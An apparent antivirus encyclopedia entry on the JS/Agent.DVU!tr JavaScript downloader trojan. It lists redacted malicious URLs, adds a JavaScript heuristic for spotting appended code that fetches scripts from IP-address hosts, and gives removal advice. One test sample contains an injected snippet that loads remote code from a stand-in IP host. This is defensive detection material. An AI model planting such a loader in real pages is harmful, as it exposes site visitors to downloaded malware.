JS/Agent.DVU!tr
Analysis
JS/Agent.DVU!tr is a generic detection for a type of JavaScript downloader trojan. Because the detection is generic, the behaviour of matching samples may vary.
Below are some of its observed characteristics/behaviours:
- The JavaScript file contains a malicious part, most likely injected at the end of the file.
- The JavaScript connects to the following malicious URL, which hosts another JavaScript file:
  - hxxp://13{Removed}.249.116.78/jquery.js
- The JavaScript retrieved from that URL attempts to connect to the following URL, which is rated as malicious:
  - hxxps://www.cpm2{Removed}.com/watch?key=789a4129e78c00008a47b36e23d65ea7
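The two traits listed above (code appended at the end of a script, and a follow-on script fetched from an IP-address host) suggest a simple triage check for script files. The following is an added example, not Fortinet's detection logic; the function names, the 2048-character tail window and the sample strings (which use the documentation address 203.0.113.7) are assumptions constructed for illustration.

```javascript
// Heuristic: report http(s) URLs whose host is an IPv4 literal and which end
// inside the last `tailChars` characters of a script, where appended code sits.
const URL_RE = /\bhttps?:\/\/([^\/\s"'`)<>\\]+)([^\s"'`)<>\\]*)/gi;
const IPV4_RE = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})(?::\d+)?$/;

// True when the host part (userinfo stripped) is a dotted-quad IPv4 address.
function isIpv4Host(host) {
  const m = IPV4_RE.exec(host.split("@").pop());
  return m !== null && m.slice(1, 5).every((octet) => Number(octet) <= 255);
}

// Scans the whole source so a URL straddling the window edge is not cut in
// half, then keeps only matches that reach into the tail window.
function findTailIpLoads(source, tailChars = 2048) {
  const tailStart = Math.max(0, source.length - tailChars);
  const hits = [];
  for (const m of source.matchAll(URL_RE)) {
    const end = m.index + m[0].length;
    if (end > tailStart && isIpv4Host(m[1])) {
      hits.push({ url: m[0], offset: m.index });
    }
  }
  return hits;
}

// Constructed samples (not taken from a real infection).
const CLEAN_SAMPLE =
  "function add(a, b) { return a + b; }\n// docs: https://example.com/api\n";
const INJECTED_SAMPLE =
  CLEAN_SAMPLE +
  ';(function(){var s=document.createElement("script");' +
  's.src="http://203.0.113.7/jquery.js";document.head.appendChild(s);})();';
// An IP-literal URL near the top of a long file falls outside a small window.
const EARLY_REFERENCE_SAMPLE =
  'var u="http://203.0.113.7/x.js";\n' + "/* padding */\n".repeat(40);

function summarize(name, source, tailChars) {
  const hits = findTailIpLoads(source, tailChars);
  return `${name}: ${hits.length === 0 ? "no tail IP-host URLs" :
    hits.map((h) => `${h.url} @${h.offset}`).join(", ")}`;
}

console.log(summarize("clean.js", CLEAN_SAMPLE));
console.log(summarize("injected.js", INJECTED_SAMPLE));
console.log(summarize("early.js", EARLY_REFERENCE_SAMPLE, 64));
```

A hit is a lead for manual review against a clean backup copy rather than a verdict, since legitimate scripts occasionally reference IP-address hosts.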
Recommended Action
- Make sure that your FortiGate/FortiClient system is using the latest AV database.
- Quarantine/delete files that are detected and replace infected files with clean backup copies.
Detection Availability
Product | Availability |
---|---|
FortiClient | Extreme |
FortiMail | Extreme |
FortiSandbox | Extreme |
FortiWeb | Extreme |
Web Application Firewall | Extreme |
FortiIsolator | Extreme |
FortiDeceptor | Extreme |
FortiEDR | |